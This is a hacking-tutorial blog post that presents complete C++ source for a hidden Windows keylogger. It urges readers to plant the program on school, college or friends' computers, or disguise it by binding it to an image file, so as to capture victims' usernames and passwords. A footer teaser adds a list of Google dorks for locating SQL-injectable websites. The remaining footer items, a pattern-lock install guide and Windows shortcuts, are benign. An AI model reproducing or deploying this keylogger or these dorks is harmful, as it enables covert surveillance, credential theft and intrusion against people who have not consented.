Skip to main content

CREATE YOUR OWN KEYLOGGER IN MINUTES

Hi guys, today I am going to talk about creating a keylogger for free using C++.I am going to introduce to the C++ Spyware code. It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
You have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
Website url is different. 
Easy to detect that we are hacking.
                             

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?

Requirements:
Dev C++.
Download it from here
Knowledge about Visual C++ (need, if you are going to develop the code).

Steps:

Install dev C++ in your system and open the dev C++ compiler.

Go to File->New->Source File.

You can see a blank works space will be there in window.

Now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)


                                   


                                   

Now execute the program by selecting Execute->Run (ctrl+F10)

Now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.

You can see the log.txt file where you save the file.


                                  


                                 


Bind the exe file with image or any files and send it to your friend.
                                                         (0R)
If you have physical access to your college/school system,then copy the exe file in that system and run it. 

That's it you are done.....
For now this is it futher i will be posting a new and more efficient keylogger. So stay updated through email!

Comments

Popular posts from this blog

List of google dorks for sql injection!!!!!

                                       List Of Google Dorks For Sql Injection Google Dork for sql injection I had previously share with you guys List of  good proxy sites to surf anonymously on the internet and today i am sharing with you a list of google dorks for sql injection which is one of most used method to hack a website. List Of Google Dorks inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id=d= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?nu...

HOW TO INSTALL PATTERN LOCK IN WINDOWS

Hi friends , smartphones are famous for their pattern lock software. If you are already using any smartphone then you know what is pattern lock and if you really like it then you can now install it on your windows PC too. Now you thinking , it is interesting to do but how can you implement it then here are some steps available for you to install pattern lock on your windows pc STEP 1. First of all you have to download & install XUS PC LOCK to your PC                                                DOWNLOAD STEP 2. Now  set a pattern to unlock your screen STEP 3. Now you'll get a icon on your desktop as well as in notification area as shown in below screenshot. STEP 4. Now it will automatically lock your PC when it is not in use like in your smartphone, you can unlock it using  pattern which you set in step 2.

SOME MORE SHORTCUTS FOR EASE OF ACCESS

General Shortcuts: Windows Key + Up – Maximize current window Windows Key + Down – Restore window or minimize Windows Key + Left – Arrange Window to left half of screen Windows Key + Right – Arrange Window to right half of screen Windows Key + Space Bar – Makes all Windows transparent to see desktop Windows Key + Pause/Break – Open System properties Windows Key + Tab – Flips all active Windows to make selection easy Windows Key + G – Bring all gadgets to front Ctrl + Click – If any application has more than one window, click on taskbar cycles through all windows Ctrl + Shift + N – Create new folder Following shortcuts are for Windows Explorer (Some Work on Internet Browsers too): Alt + Left – Go back Alt + Right – Go forward Alt + Enter – Open properties of selected folder Alt + Esc – Cycle through all active Windows Alt + D – Focus on address bar Alt + P – Show/Hide preview panel Ctrl + N – New Window Ctrl + Mouse wheel – Change icon view type (Small ,L...